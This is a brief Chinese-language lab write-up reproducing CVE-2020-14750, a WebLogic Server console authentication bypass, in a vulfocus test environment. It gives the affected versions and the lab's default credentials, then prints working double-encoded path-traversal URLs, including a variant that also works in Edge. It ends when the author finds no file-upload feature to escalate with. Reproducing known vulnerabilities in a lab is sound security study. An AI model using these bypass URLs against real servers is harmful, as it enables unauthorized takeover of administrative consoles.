事项

描述

漏洞概述

远程攻击者可以构造特殊的 HTTP 请求，在未经身份验证的情况下接管 WebLogic Server Console

影响范围

10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4、14.1.1.0

漏洞编号

CVE-2020-14750

这里使用vulfocus进行复现。

访问http://192.168.146.167:34029/console/login/LoginForm.jsp，搭建成功。

需要注意的是，需要我们先登录才行，不登陆就无法进行未授权，weblogic/welcome1。这里我是在虚拟机里面进行登录的，下面的验证是在本机进行验证的。

访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal，发现有些浏览器可以绕过登录，比如火狐浏览器或者谷歌浏览器。

但是，使用Edge浏览器的时候，发现绕不了，很奇怪。

于是自己一直进行尝试，找到了有个Edge浏览器也可以绕过的url。访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29。

然后尝试查找上传文件的地方，找了很久发现没有文件上传的地方。。。正常的流程是在后台有一个锁定并编辑的按钮的，但是我没有。